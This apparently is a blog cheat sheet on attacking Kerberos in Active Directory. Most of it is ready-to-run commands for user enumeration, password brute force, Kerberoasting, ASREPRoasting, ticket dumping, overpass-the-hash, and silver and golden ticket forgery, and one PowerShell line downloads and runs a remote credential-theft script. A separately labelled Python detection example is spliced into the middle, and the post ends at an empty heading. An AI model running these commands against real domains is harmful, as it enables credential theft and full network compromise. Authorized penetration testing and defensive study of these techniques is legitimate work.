Kerberos Penetration Testing Fundamentals

Understanding Kerberos Security Testing

Today I will write about Kerberos penetration testing. Kerberos is the protocol Active Directory uses to manage authentication inside corporate environments.

First, a brief explanation of how Kerberos works and what we should know before trying to hack Kerberos.

Kerberos Introduction

Kerberos flows

Kerberos Components

  • KDC – Key Distribution Center, the authentication service that issues tickets (in Active Directory, the domain controller)

  • Client – the principal requesting access to a service

  • Service – the service for which a ticket is requested

TGT – Ticket Granting Ticket

SPN – Service Principal Names are associated with service accounts and can be used to request Kerberos service tickets (TGS).

In Kerberos, when the RC4_HMAC_MD5 encryption type is in use, the key that encrypts the ticket is the account's NTLM hash.

Kerberos Authentication

Tools

  • CrackMapExec

  • Rubeus

  • Metasploit

  • Empire

  • nmap

  • john

  • hashcat

  • kerbrute

Kerberos Penetration Testing

Enumeration

# Enumerate valid usernames against the DC (10.0.0.1 is the DC used throughout this post)
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
# Try a password list against a single known username
kerbrute bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username
# Same enumeration with the nmap NSE script; the DC address is the scan target
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='rfs.local' 10.0.0.1

Kerberos Attacks

Brute Force Kerberos

kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt

Kerberoasting

# Request service tickets for every account with an SPN (impacket)
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
# Same from a domain-joined Windows host (Rubeus)
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
# Same with the Empire PowerShell module; load it first, then run it
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

Crack the Hashes

# Mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4_HMAC)
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <TGSs_file>

ASREPRoast

Check ASREPRoast for all domain users (credentials required).

python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Check ASREPRoast for a list of users (no credentials required)

python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
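As an added example (not part of the original post), a small Python detector for the Kerberoasting and ASREPRoast activity described in the two sections above, run over constructed Windows Security log records shaped like Event ID 4769 (service ticket request) and 4768 (TGT request); the JSON field names and the three-ticket threshold are assumptions.

```python
# Added example: flag RC4 service-ticket bursts (Kerberoasting) and TGTs issued
# without pre-authentication (ASREPRoast) in constructed Windows Security events.
import json
from collections import defaultdict

RC4_HMAC = "0x17"          # TicketEncryptionType for RC4_HMAC_MD5 (NT hash is the key)
KERBEROAST_THRESHOLD = 3   # distinct RC4 service tickets per user (assumed window)

# Constructed sample events (not real log data), one JSON object per line.
SAMPLE_LOG = """\
{"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "MSSQLSvc", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "http_svc", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "backup_svc", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "svc_legacy", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "carol", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"}
"""

def parse_events(text):
    """Parse one JSON object per line; skip blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def detect_kerberoasting(events, threshold=KERBEROAST_THRESHOLD):
    """Users that obtained >= threshold distinct RC4 service tickets.
    krbtgt and machine accounts (names ending in $) are skipped: they
    normally use AES and are not the targets of the roasting above."""
    per_user = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue  # only successful TGS requests
        if e.get("TicketEncryptionType") != RC4_HMAC:
            continue  # AES tickets are not the downgrade we are looking for
        svc = e.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_user[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in per_user.items() if len(s) >= threshold}

def detect_asrep_roasting(events):
    """Accounts issued a TGT with no pre-authentication (PreAuthType 0)."""
    return sorted({e["TargetUserName"] for e in events
                   if e.get("EventID") == 4768 and e.get("PreAuthType") == "0"})

if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    print("Kerberoasting candidates:", detect_kerberoasting(evs))
    print("AS-REP roastable accounts:", detect_asrep_roasting(evs))
```

On the sample data it reports alice (three distinct RC4 service tickets) and svc_legacy (TGT issued without pre-authentication); bob's AES request for a machine account is ignored.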

Pass The Ticket (PTT)

Harvest Tickets in Linux

# Find where credential caches are stored on this host
grep default_ccache_name /etc/krb5.conf

# Copy the tickey binary to the host and run it to collect the caches it can read
cp tickey /tmp/tickey
/tmp/tickey -i

Harvest Tickets in Windows

mimikatz # sekurlsa::tickets /export

.\Rubeus.exe dump

Convert Tickets

python ticket_converter.py ticket.kirbi ticket.ccache

python ticket_converter.py ticket.ccache ticket.kirbi

Overpass The Hash/Pass The Key (PTK)

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

python getTGT.py <domain_name>/<user_name>:[password]

export KRB5CCNAME=<TGT_ccache_file>

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Silver Tickets

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

export KRB5CCNAME=<TGS_ccache_file>

Execute a remote command using the forged ticket.

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Golden Tickets

python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

export KRB5CCNAME=<TGT_ccache_file>

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Kerberos Post-Exploitation
